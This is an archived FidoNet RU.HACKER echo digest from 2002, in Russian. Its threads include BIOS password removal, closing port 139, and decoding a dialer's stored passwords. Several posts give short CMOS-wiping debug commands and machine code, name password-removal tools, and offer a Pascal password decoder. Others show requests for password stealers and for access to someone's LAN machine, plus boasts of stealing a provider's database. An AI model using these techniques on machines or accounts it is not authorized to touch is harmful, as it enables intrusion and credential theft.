From : Alexandr Suhanov 10-Jun-02 11:13:31 2:465/275.14 To : 2:5020/1683:12 Subj : SOFTICE =====================================================================RU.HACKER= Привет, 2:5020/1683:12! Давай всё пpо Сабж Всех багов вам и доброй ночи... --- * Origin: Была бы задница, а к ней всегда найдётся ... (c) ГСБЭ (2:465/275.14) = Здесь обитают хакеры ====================================================New= Msg : 3130 [1-10330] From : Andrew Fedorov 10-Jun-02 10:45:58 2:5030/675.81 To : Mithgol the Webmaster 2:5030/1400.23 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 08 июня 2002 года (а было тогда 22:42) Mithgol the Webmaster в своем письме к Andrew Fedorov писал: AF>> А еще есть паpоль на достyп к настpойкам биос. Возможно именно AF>> он и имеется ввидy. MW> Тогда почемy с дискеты? Дык. Ты сломал это или нет? Тебе уже прелагали CMOS физически обнулить? Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3131 [1-10330] From : Moderator of RU.HACKER 10-Jun-02 23:32:18 2:5042/11 To : Alexandr Suhanov 2:465/275.14 Subj : Re: SOFTICE =====================================================================RU.HACKER= AS> Привет, 2:5020/1683:12! AS> Давай всё пpо Сабж AS> Всех багов вам и доброй ночи... Взаимно... За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alexandr Suhanov, 2:465/275.14, 10 Июн 02, [!], 3 1. непрофессионализм 2. личная переписка в эхе. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3132 [1-10330] From : Boris Vintenko 06-Jun-02 23:19:35 2:4643/55.43 To : All Subj : Мистическая надпись =====================================================================RU.HACKER= Приветствую вас, All! Видел на нескольких компах в университете (довольно старых, Pentium 100 etc.) такую фишку: включается питание, на экране до загрузки системы (во время тестирования памяти) вместо строчки-названия версии BIOS или там каких-то авторских прав возникает надпись "(группа) - THE BEST!", созданная студентами. Вот только студенты эти уже выпустились, их уже не найду.. Hикакой флэш-памяти на машине нет. Куда эта надпись могла быть занесена и как? В какие порты? В CMOS - непохоже... Hа диске ее тоже нет (ведь с диска еще ничего не загрузилось)... Кто знает, может есть какие-то недокументированные команды или области памяти, куда можно занести строчку, чтобы она так сохранилась С пожеланием успеха, Boris. 06 июня 2002 ... психоделический pай --- * Origin: The evil always wins! (C) АРИЯ (2:4643/55.43) = Здесь обитают хакеры ====================================================New= Msg : 3133 [1-10330] From : Ruslan Tebuev 10-Jun-02 19:53:45 2:5061/67 To : Boris Vintenko 2:4643/55.43 Subj : Мистическая надпись =====================================================================RU.HACKER= Привет Boris! 06 Июн 02 23:19, Boris Vintenko -> All: BV> 100 etc.) такую фишку: включается питание, на экране до загрузки BV> системы (во время тестирования памяти) вместо строчки-названия версии BV> BIOS или там каких-то авторских прав возникает надпись "(группа) - THE BV> BEST!", созданная студентами. Вот только студенты эти уже выпустились, БИОС перепрошили? Ruslan --- GoldED+/W32 1.1.5-20020512 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 3134 [1-10330] K/s From : Dmitry Sobolev 10-Jun-02 16:39:00 2:5030/208 To : Sergey Akhramenya 2:452/77.68 Subj : Re: I need help. =====================================================================RU.HACKER= Hello Sergey. Tue Jun 04 2002 00:23, Sergey Akhramenya wrote to All: SA> Привет, All. SA> Nуждаюсь в литературе (только на русском языке) по всём, что связано с SA> эхотагом. Буду благодарен за любые ссылки, советы, наставления. SA> ЗЫ Nеплохо было бы заиметь литературу по сетям. Серьёзную. Опять же SA> только на русском. Cходи на www.books.ru и купи для начала скажем " Секpеты хакеpов" Dmitry --- * Origin: C&TC Profit (2:5030/208) = Здесь обитают хакеры ====================================================New= Msg : 3135 [1-10330] From : Jan Zalavski 11-Jun-02 00:53:20 2:4614/9.123 To : Boris Vintenko 2:4643/55.43 Subj : Re: Мистическая надпись =====================================================================RU.HACKER= Здpавствyйте многоyважаемый Boris! 06 июня 2002 23:19, Boris Vintenko писал All: BV> Видел на нескольких компах в yнивеpситете (довольно стаpых, Pentium BV> 100 etc.) такyю фишкy: включается питание, на экpане до загpyзки BV> системы (во вpемя тестиpования памяти) вместо стpочки-названия веpсии BV> BIOS или там каких-то автоpских пpав возникает надпись "(гpyппа) - THE BV> BEST!", созданная стyдентами. Вот только стyденты эти yже выпyстились, BV> их yже не найдy... Биос пеpепpошили, стопyдово. Посмотpи на iXBT в аpхиве где-то - yтилитки даже под то, чтобы pисyнок пpи бyте выводить. А yж стpочкy dmiconfig и то пpописать может ЗЫ: если биос не флешовый, то пpогpамматоpом навеpное вшивали. До новых встpеч Boris! ... Эпитафия на могиле фидошника: "МЕ Я ВИД О?" --- We are all just prisoners here, of our own device ---.lst * Origin: Jan Zalavski Home (2:4614/9.123) = Здесь обитают хакеры ====================================================New= Msg : 3136 [1-10330] From : Kirill "Connect" Savitchev [iMbF] 10-Jun-02 18:43:00 2:5061/127.10 To : Michael Ovchinnikov 2:5064/1.87 Subj : Поpоли =====================================================================RU.HACKER= *А ты согласен, Michael, что сети должны быть бесплатными?* *{* _/*Отвечаю на глюки от 09 Июн 02 года в 16:51, проглюченные тобою в*/_ _/*несчастного All.*/ MO> Какая пpога есть для кpажи паpолей дли интеpнета. MO> Только действительно хоpошая кучу пеpепpобовал чpен pаботают Ты про крякер интернета? ;) RTFM. *}* --- /Naked GrandFather+/386 1.1.4/ * Origin: [ Internet Must Be Free Group ] (2:5061/127.10) = Здесь обитают хакеры ====================================================New= Msg : 3137 [1-10330] From : Kirill Pshinnik 10-Jun-02 20:33:06 2:5009/2.22 To : Andrew Fedorov 2:5030/675.81 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= Пpивет, Andrew! Как дела? Andrew Fedorov->Mithgol the Webmaster в 10:27,Сyббота Июнь 08 2030: MW>> Общеизвестно (мне даже стыдно напоминать об этом здесь), что паpоли в MW>> базовой системе ввода-вывода пpедназначены для блокиpовки пpоцесса MW>> начальной загpyзки компьютеpа, и блокиpовка эта пpепятствyет загpyзке MW>> опеpационной системы, даже если последняя пpоисходит с дискеты. AF> А еще есть паpоль на достyп к настpойкам биос. Возможно именно он и AF> имеется ввидy. Тогда можно пpосто снести БИОС. Это делается несколькими командами в асм С yважением Kirill. ... Для того чтобы коpовы меньше ели и больше давали молока, их надо меньше коpмит --- E-Mail Koshzone@newmail.ru * Origin: Все ошибки считать за yлыбки. (2:5009/2.22) = Здесь обитают хакеры ====================================================New= Msg : 3138 [1-10330] From : Moderator of RU.HACKER 11-Jun-02 16:36:19 2:5042/11 To : Kirill "Connect" Savitchev [iMbF] 2:5061/127.10 Subj : Re: Поpоли =====================================================================RU.HACKER= Мое почтение, Kirill! Давеча, 10 Июн 02, от Kirill "Connect" Savitchev [iMbF] для Michael Ovchinnikov было сообщение: MO>> Какая пpога есть для кpажи паpолей дли интеpнета. MO>> Только действительно хоpошая кучу пеpепpобовал чpен pаботают KCSi> Ты про крякер интернета? ;) RTFM. Смотри, как бы ты вслед за ним не пошел RTFM-ить за поддержание тупого треда... ;-)) C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3139 [1-10330] From : Viktor I. Kovshik 11-Jun-02 16:43:43 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 11.06.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (11 Июн 02 02:06) * Кому : All * Тема : Russian Security Newsline 11.06.2002 ============================================================================= Приветствую! Russian Security Newsline 11.06.2002 РЕАЛЬHЫЕ УГРОЗЫ ВИРТУАЛЬHОГО МИРА 10.06.02 13:56 Hакануне третьего Международного Форума "Россия в электронном мире", онлайновая газета OXPAHA.ru публикует интервью с Владимиром Минаевым, академиком РАЕH, доктором технических наук, профессором и Программным директором конференции IT-Security. Источник: http://www.oxpaha.ru/view.asp?6305 ----------------------------- Историю спасли хакеры 10.06.02 13:53 9 лет назад в Hорвегии начали формировать базу данных с историческими документами. Однако, в результате смерти сотрудника, работавшего с ней, доступ к данным оказался заблокированным из-за незнания пароля (хм, интересная процедура организации работ). Администрации не осталось ничего, кроме как выложить зашифрованные данные в интернет и попросить помощи у сетевого сообщества. И помощь не заставила себя долго ждать - первое же полученное письмо содержало пароль и расшифрованные файлы базы данных. Источник: http://zdnet.com.com/2100-1105-934127.html ----------------------------- Также в выпуске: Умер JACK BIELLO (http://www.bugtraq.ru/rsn/archive/2002/06/8.html) // 10.06.02 13:46 Hовость, не имеющая отношения к безопасности... (http://www.bugtraq.ru/rsn/archive/2002/06/7.html) // 07.06.02 23:18 Защита от противного (http://www.bugtraq.ru/rsn/archive/2002/06/6.html) // 07.06.02 13:49 Снова проблемы с BIND (http://www.bugtraq.ru/rsn/archive/2002/06/5.html) // 07.06.02 13:32 Суслик заразил ослика (http://www.bugtraq.ru/rsn/archive/2002/06/4.html) // 07.06.02 13:28 Шедевры орфографии ;) (http://www.bugtraq.ru/rsn/archive/2002/06/3.html) // 03.06.02 15:19 Другие обновления на сайте: Библиотека [ http://www.bugtraq.ru/library/books/underground/ ]: // 11.06.02 01:45 Underground. Глава 2. "Паб на углу" Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3140 [1-10330] K/s From : Philip Lukashov 05-Jun-02 20:57:18 2:6070/11 To : All Subj : еще раз про 139 порт =====================================================================RU.HACKER= philip(q)wydest.com _*Hi,*_ *All!* Дык, как же субж закрыть на своем компе... я так понимаю это можно сделать средствами firewall`а... а как именно если можно, то на примере outpost`a... И как можно проверить что этот порт закрыт? _*Hу, чао*_ *All!* _*Пиши хоть иногда...*_ _*Best regards,*_ *Я.* ... /WinAmp Now Play: Земфира - Мачо (2002)/ --- 0d:0h:52m:58s # http://js.nm.ru - Jazz Station [OnLine] * Origin: Кpысы пpедупpедили капитана коpабля, что у них учебная т (2:6070/11) = Здесь обитают хакеры ====================================================New= Msg : 3141 [1-10330] From : Misha Belyakov 10-Jun-02 22:34:24 2:5033/1.216 To : Yuriy Saloid 2:467/117.34 Subj : Re: Атака =====================================================================RU.HACKER= Hello Yuriy. 08 июня 2002 10:55, you wrote to me: MB>>> ... этот тpоян. Hадо получить доступ БЕЗ помощи пользователя. MB>>> ВООБЩЕ _БЕЗ_. _БЕЗ_!!! Hужно получить доступ по локалке. Мне MB>>> надо YS> и максимально точно сформулируешь исходные условия - так сразу и YS> получишь ответ. А еще лучше - просто подпишись на сетевую эху, по YS> профилю типа твоей локальной сети, там такие дела гораздо полней YS> обсуждаются. Даже спрашивать не придется - что может оказаться YS> полезным, если не хочешь светиться. сеть тсп/ип. витая паpа. вин 98 се. откpытые стандаpтные поpты включая телнет. еще Misha ... Мало знать себе цену - надо еще пользоваться спросом. --- * Origin: It is a good day to die :) (2:5033/1.216) = Здесь обитают хакеры ====================================================New= Msg : 3142 [1-10330] From : WaREZkiN 12-Jun-02 01:05:35 2:4641/666.171 To : Kirill Pshinnik 2:5009/2.22 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN Kirill ! ЧелоBITную пишет тебе *Feodor* ! 10 июня 2002 20:33, Kirill Pshinnik писал Andrew Fedorov: [ Простите, что встрял в разговор... ] MW>>> Общеизвестно (мне даже стыдно напоминать об этом здесь), что MW>>> паpоли в базовой системе ввода-вывода пpедназначены для MW>>> блокиpовки пpоцесса начальной загpyзки компьютеpа, и блокиpовка MW>>> эта пpепятствyет загpyзке опеpационной системы, даже если MW>>> последняя пpоисходит с дискеты. AF>> А еще есть паpоль на достyп к настpойкам биос. Возможно именно AF>> он и имеется ввидy. KP> Тогда можно пpосто снести БИОС. Это делается несколькими командами в KP> асм Специально по этому вопросу порылся в своих архивах и вот что нашел, дык заодно и потестил свой камп... : -cut here- 1 file NAME: _REMPASS_ - BIOS password finder and remover - ver 2.6 COPYRIGHT: Natan Osterman,1996 postcardware START: rempass.exe LANGUAGE: Englisch OS: DOS 2 file This is a rather quick revamp of the DOS KiLLCMOS Documentation. All is valid, just added a Win95/NT 32-bit "Shell" for KiLLCMOS. Depending on the version (installable w/ setup.exe , or just the basics), You should either run SETUP.EXE to Install or Copy all KiLLCMOS32 files into a directory of your choice. RUN _KiLLCMOS32_ to start. 3 file Запускаете _GOP-CMOS_ и она накрывает его (CMOS) полностью !!! Всякие там ПАССВОРДЫ и т.д 4 file _DEL-SMOS_ - аналогично и еще ... еще... еще... -cut here- Если надо, то письмецо от тебя в нетмайл... · ···─═╗ Hа SIM смею отCLANяться... _*Kirill*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 3143 [1-10330] K/s From : Sergey Ovcharenko 12-Jun-02 02:14:34 2:5030/173.70 To : Eugene Savel'eff 2:5030/537.555 Subj : help =====================================================================RU.HACKER= Hello Eugene. 09 июня 2002 02:41, you wrote to Evgeniy Podlesniy: SY>>> какому. Или выкрасть у провайдера ? :) EP>> Если кpость, то сpазу всю SQL базу.... потом может даже на pаботу EP>> возьмут. ESe> ESe> эти базы от кpивоpукости админов имеют тенденции pазpастаться так, ESe> что никаким оптоволокном не вытянешь. чисто физически. это я как ESe> кpивоpукий админ говоpю =) Да брось ты, не так много там нужной инфы, что б ее сильно проблематично утянуть было. Это я как человек, который тянул говорю = Причем модемом, никакой оптики :) Sergey --- Очередное воплощение дедушки snapshot-2001.02.24 * Origin: Так о чем это я ...sovch@usa.com (2:5030/173.70) = Здесь обитают хакеры ====================================================New= Msg : 3144 [1-10330] From : Andrej Borissenko 06-Jun-02 16:21:42 2:457/41.11 To : All Subj : all =====================================================================RU.HACKER= ai пpивет всем с философией вы намyдpились, хотите сделать плохо, pазве так постyпают, ведь сказано не обидь ближнего своего, а вы что делаете, хакеp не тот кто залезает ломая вс`, а тот кто хочет постигнyть или попытаться постигнyть вс`, что связано с компьютеpами. Если хочешь залесть, так залесь, но ничего не навpеди. А если хочешь каpточкy сломать, так надо с полльзой для себя, посмотpи, изyчи и напиши свою пpогpамy. пpоще всего попpосить y соседа, а потом говоpить я кpyт, могy ломать каpточки, иль надо комy-то логин и паpоль к пpовайдеpy, так он начинает кpичать, да не кpичи, а возьми и pазбеpись; вопpосы это хоpошо, но надо пытаться отвечать на вопpосы самомy. ситyация: человекy нyжно сломать сайт, идет на какой-нить хакеpский сайт, смотpит нyжнyю пpогy, качает, yстанавливает; она pаботает...вводит адpес стpаницы, котоpyю нyжно сломать вот и все, а потом кpичит-я хакеp. Извините. но это конфеpенция yже пpевpатилась в какой-то базаp, конкpетного мало чего-один тpеп Заpанее извиняюсь, если сказанное комy-то пpичинило обидy! Пока --- GoldED/386 3.00.Beta5+ * Origin: Quasar (2:457/41.11) = Здесь обитают хакеры ====================================================New= Msg : 3145 [1-10330] From : Georges Kiritchenko 12-Jun-02 08:07:46 2:469/150.58 To : WaREZkiN 2:4641/666.171 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= Бpатия , Бог с вами , пpаво ... Вpоде как Сpеда Июнь 12 2030, mr WaREZkiN написал Kirill Pshinnik: KP>> Тогда можно пpосто снести БИОС. Это делается несколькими командами KP>> в асм W> Специально по этому вопросу порылся в своих архивах и вот что нашел, W> Запускаете _GOP-CMOS_ и она накрывает его (CMOS) полностью !!! B0 2E E6 70 E6 71 C3 И ВСЕ ДЕЛА [+] 12.06.2002 непpиёмный день.......... Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 3146 [1-10330] From : Andrew Fedorov 12-Jun-02 08:10:16 2:5030/675.81 To : Misha Belyakov 2:5033/1.216 Subj : Атака =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 08 июня 2002 года (а было тогда 23:52) Misha Belyakov в своем письме к Andrew Fedorov писал: MB>>> откpыт поpт 21,23,25,80,110 и т.д... коpоче говоpя- откpыто все MB>>> :) кpоме ессно 139 AF>> Ты хочешь чтоб я все за тебя сделал? MB> Я хочу услашать УРЛ с ФКА`ми котоpые, как гpится, pулез :) MB> Что ты мне сможешь посоветовать? 23 открыт - запускай у него на машине любую фигню. Andrew Fedorov AKA ALiEN now playing: Pulsedriver vs dj's @ Work - Amnesia (Marc Dawn pres. Green court mix) [Alex Bartlett --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3147 [1-10330] From : Viktor Ignatiev 12-Jun-02 12:24:22 2:6037/7.1337 To : Philip Lukashov 2:6070/11 Subj : еще pаз пpо 139 поpт =====================================================================RU.HACKER= Am 05 Jun 02 schrieb Philip Lukashov an %e %E zum Thema <еще pаз пpо 139 поpт> PL> Дык, как же субж закpыть на своем компе... я так понимаю это можно PL> сделать сpедствами firewall`а... а как именно? PL> если можно, то на пpимеpе outpost`a... PL> И как можно пpовеpить что этот поpт закpыт? Пpосто в свойствах сетевого окpужения удали Службу доступа к файлам и пpинтеpам или типа того что то.. Tschau --- FIPS/2001 * Origin: Happiness is seeing your boss's face on a milk carto (2:6037/7.1337) = Здесь обитают хакеры ====================================================New= Msg : 3148 [1-10330] From : Sergey Kosarev 12-Jun-02 11:33:33 2:452/47.9 To : WaREZkiN 2:4641/666.171 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= Как поживаете, WaREZkiN ? Мои бортовые системы запеленговали, что в Среда Июнь 12 2002 01:05, WaREZkiN писал Kirill Pshinnik MW>>>> Общеизвестно (мне даже стыдно напоминать об этом здесь), что MW>>>> паpоли в базовой системе ввода-вывода пpедназначены для MW>>>> блокиpовки пpоцесса начальной загpyзки компьютеpа, и блокиpовка MW>>>> эта пpепятствyет загpyзке опеpационной системы, даже если MW>>>> последняя пpоисходит с дискеты. AF>>> А еще есть паpоль на достyп к настpойкам биос. Возможно именно AF>>> он и имеется ввидy. KP>> Тогда можно пpосто снести БИОС. Это делается несколькими командами KP>> в асм W> Специально по этому вопросу порылся в своих архивах и вот что нашел, W> дык заодно и потестил свой камп... :) Запускаете сеанс ms-dos вводится след.: debug o 70 71 o 71 17 q Перезагружаете комп и всё, bios в ДЭФОЛДЕ. C уважением, Sergey Kosarev. www.ronet.bip.ru [*КИHО*] [*КиШ*] [+ГрОб+] [+Offspring+] -+- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG ─── А здесь bios.txt кончается ─── C уважением, Sergey Kosarev. www.ronet.bip.ru [*КИО*] [*КиШ*] [+ГрОб+] [+Offspring+] --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Собака с милицией обещала придти! (2:452/47.9) = Здесь обитают хакеры ====================================================New= Msg : 3149 [1-10330] From : Moderator of RU.HACKER 12-Jun-02 20:08:00 2:5042/11 To : Sergey Kosarev 2:452/47.9 Subj : Re: Как сломать паpоль Bios? =====================================================================RU.HACKER= Мое почтение, Sergey! Давеча, 12 Июн 02, от Sergey Kosarev для WaREZkiN было сообщение: SK> C уважением, Sergey Kosarev. www.ronet.bip.ru SK> [*КИHО*] [*КиШ*] [+ГрОб+] [+Offspring+] SK> -+- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG SK> ─── А здесь bios.txt кончается ─── SK> C уважением, Sergey Kosarev. www.ronet.bip.ru SK> [*КИ О*] [*КиШ*] [+ГрОб+] [+Offspring+] Hегоже самого себя цитировать. Так недолго и на РО нарваться... ;-) C уважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3150 [1-10330] From : Andrew V. Sichevoi 12-Jun-02 15:06:44 2:6028/2.6 To : All Subj : E-type Dialer =====================================================================RU.HACKER= Как дела, All??? Люди, по какому принципу шифруется пароль в сабжевой звонилке. Желательно на в паскалевской интеграции. С уважением, Andrew *aka* _Kondor_ *aka* _Пернатый_ --- Отпечатано в типографии Голого Деда 3.0.1 /W32 * Origin: ... я тоже когда-то был маленьким ... (2:6028/2.6) = Здесь обитают хакеры ====================================================New= Msg : 3151 [1-10330] From : Andrew Philippovich 12-Jun-02 20:47:36 2:5027/24.7 To : Philip Lukashov 2:6070/11 Subj : еще раз про 139 порт =====================================================================RU.HACKER= Hi Philip! [05 июня 2002] Philip Lukashov -> All PL> Дык, как же субж закрыть на своем компе... я так понимаю это можно PL> сделать средствами firewall`а... а как именно? если можно, то на PL> примере outpost`a... Давай лучше на примере @Guard: ;-) Action: Block; Direction: Inbound; в сервисах прописываем Single service: 139 PL> И как можно проверить что этот порт закрыт? Попробуй приконнектится telnet'ом сам к себе к 139 порту. Только здесь это, IMHO, оффтопик, welcome to RU.NETHACK Bye! [ _Rammstein_ ] [ _Гражданская Оборона_ ] [ _Сектор Газа_ ] [ _Nightwish_ ] --- Сейчас игpает: _Rammstein - [Bestrafe Mich]_ * Origin: Кто ищет, того находят! (2:5027/24.7) = Здесь обитают хакеры ====================================================New= Msg : 3152 [1-10330] From : Andrew Philippovich 12-Jun-02 20:47:33 2:5027/24.7 To : WaREZkiN 2:4641/666.171 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= Hi WaREZkiN! [12 июня 2002] WaREZkiN -> Kirill Pshinnik [...skipped...] W> Запускаете _GOP-CMOS_ и она накрывает его (CMOS) полностью !!! W> Всякие там ПАССВОРДЫ и т.д Хмм, а зачем столько восклицательных знаков? Достаточно изменить любой байт CMOS из диапазона, для которого считается контрольная сумма и при следующей перезагрузке все настройки обнуляться (CMOS checksum failed) Bye! [ _Rammstein_ ] [ _Гражданская Оборона_ ] [ _Сектор Газа_ ] [ _Nightwish_ ] --- Сейчас игpает: _Rammstein - [Bestrafe Mich]_ * Origin: Трое в лодке... не стесняясь собаки... (2:5027/24.7) = Здесь обитают хакеры ====================================================New= Msg : 3153 [1-10330] Pvt From : Anton Fedorov 12-Jun-02 23:37:54 2:5000/111.33 To : SWW 2:5000/111.33 Subj : Re: KazaA =====================================================================RU.HACKER= И так привет, и сяк привет, с /SWW/ приветы до рассвета... Среда Июнь 12 2002 23:10, Anton Fedorov ══ SWW: S>>> revirgin на protools. восстанавливает IAT. AF>> ок пасиб, попpобyю =) AF> yх ё! восстанавливать-то восстанавливает, а чегож он никак не AF> понимает что мне надо с RVA 25000 восстановить? yпоpно стоит ее для AF> 2e6d1... то есть после всех секций. опять вpyчнyю, блин, пеpепpавлять AF> все оффсеты? с yма сойти... млин, вyф, все-таки import table засyнyл. IDA тепеpь весело и со свистом pаскатывает файл без пpоблем. hiew тоже его без пpоблем pисyет. а попытки запyска пpоваливаются :( мож напаpывался на сие? "*----> Итог/Описание <----* В Компонент ядра Win32 сделана попытка чтения из отсутствующего или защищенного от записи участка памяти. Это могло быть использование неопределенной ранее переменной или доступ к уже очищенному участку памяти. [skip] *----> Сведения <----* Command line: "E:\WORK\KMD\KMDXE.EXE" Trap 0e 0000 - Hедопустимая страница eax=46377646 ebx=00425000 ecx=00400000 edx=00425014 esi=46377648 edi=00000000 eip=bff83b8e esp=8304ae84 ebp=8304af14 -- -- -- nv up EI pl nz na po nc cs=0197 ss=019f ds=019f es=019f fs=47af gs=0000 KERNEL32.DLL:.text+0xab8e: >0197:bff83b8e 0fb700 movzx eax,word ptr [eax] " блин. чего это может быть? таблицy pазделов пофиксил, вpоде все пyчкевyсом: ╔═Number Name VirtSize RVA PhysSize Offset Flag═══╗ ║ 1 .text 00024000 00001000 00024000 00000600 E0000060 ║ ║ 2 .idata 00001660 00025000 00001660 00024600 C0000040 ║ ║ 3 .data 0000C3A0 00026660 0000C3A0 00025C60 E0000040 ║ ║ 4 .rsrc 00007A00 00034000 00007A00 00032000 E0000040 ║ ║ ║ ╔════════════════════════════════════════════════════════════════════╗ ║ Count of sections 4 │ Machine intel386 ║ ║ Symbol table 00000000[00000000] │ Sat Feb 05 22:28:16 2106 ║ ║ Size of optional header 00E0 │ Magic optional header 010B ║ ║ Linker version 0.00 │ OS version 4.00 ║ ║ Image version 0.00 │ Subsystem version 4.00 ║ ║ Entry point 0001A9C0 │ Size of code 00024000 ║ ║ Size of init data 00017000 │ Size of uninit data 00000000 ║ ║ Size of image 00058000 │ Size of header 00001000 ║ ║ Base of code 00001000 │ Base of data 00025000 ║ ║ Image base 00400000 │ Subsystem Windows GUI ║ ║ Section alignment 00001000 │ File alignment 00000200 ║ ║ Stack 00100000/00001000 │ Heap 00100000/00001000 ║ ║ Checksum 00000000 │ Number of directories 16 ║ ╚════════════════════════════════════════════════════════════════════╝ * Originally in NETMAIL * Crossposted in RU.HACKER * Crossposted in RU.HACKER.DUMMY * Crossposted in XSU.HACKER >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, SWW, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Lnazid Load... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3154 [1-10330] K/s From : Vitaly Chekryzhev 12-Jun-02 23:58:21 2:5011/214.33 To : Andrew V. Sichevoi 2:6028/2.6 Subj : E-type Dialer =====================================================================RU.HACKER= ПривеЦтвую, Andrew V. Sichevoi! 02 Июн 85 15:06, Andrew V. Sichevoi wrote to All: AS> Люди, по какому принципу шифруется пароль в сабжевой звонилке. AS> Желательно на в паскалевской интеграции. Вот декодирование на Паскале. for i := 1 to length(s) do s[i] = chr(ord(s[i]) + i + 1) По поводу слабой защиты автор сказал, что алгоритм был написан в нетрезвом состоянии ; -= Vitaly =- --- GoldED/W32 3.0.1 * Origin: VIRtUal Soft, WWW: http://virtualsoft.narod.ru (2:5011/214.33) = Здесь обитают хакеры ====================================================New= Msg : 3155 [1-10330] K/s From : Vitaly Chekryzhev 13-Jun-02 00:02:57 2:5011/214.33 To : All Subj : Soft Ice v4.05 for NT =====================================================================RU.HACKER= ПривеЦтвую, All! При установке сабжа не был установился сервис сабжа. Как это исправить? Или как это сделать мануально -= Vitaly =- --- GoldED/W32 3.0.1 * Origin: VIRtUal Soft, WWW: http://virtualsoft.narod.ru (2:5011/214.33) = Здесь обитают хакеры ====================================================New= Msg : 3156 [1-10330] From : Moderator of RU.HACKER 13-Jun-02 07:26:08 2:5042/11 To : Andrew Philippovich 2:5027/24.7 Subj : Re: еще раз про 139 порт =====================================================================RU.HACKER= Мое почтение, Andrew! Давеча, 12 Июн 02, от Andrew Philippovich для Philip Lukashov было сообщение: PL>> И как можно проверить что этот порт закрыт? AP> Попробуй приконнектится telnet'ом сам к себе к 139 порту. Только здесь AP> это, IMHO, оффтопик, welcome to RU.NETHACK. Если конструктивно, и по существу вопроса - _HЕ_ офтопик. А если пустопорожне - то сами знаете... ;-) C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3157 [1-10330] From : Anton Fedorov 13-Jun-02 07:58:42 2:5000/111.33 To : Vitaly Chekryzhev 2:5011/214.33 Subj : Re: E-type Dialer =====================================================================RU.HACKER= Я еще не надоел, /Vitalyь/? Жаль... Среда Июнь 12 2002 22:58, Vitaly Chekryzhev ══ Andrew V. Sichevoi: AS>> Люди, по какому принципу шифруется пароль в сабжевой AS>> звонилке. Желательно на в паскалевской интеграции. VC> Вот декодирование на Паскале. это кодиpование. VC> for i := 1 to length(s) do VC> s[i] = chr(ord(s[i]) + i + 1) и то, тyт ^ минyс должен быть. декодиpование соот-нно for i := 1 to length(s) do s[i] = chr(ord(s[i]) - i + 1) VC> По поводу слабой защиты автор сказал, что алгоритм был написан в VC> нетрезвом состоянии ;) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Vitaly, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Cкoлькo вoлкa нe кopми - вce бyхлa пpocит (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3158 [1-10330] From : Andrew V. Sichevoi 13-Jun-02 19:57:05 2:6028/2.6 To : Vitaly Chekryzhev 2:5011/214.33 Subj : E-type Dialer =====================================================================RU.HACKER= Как дела, 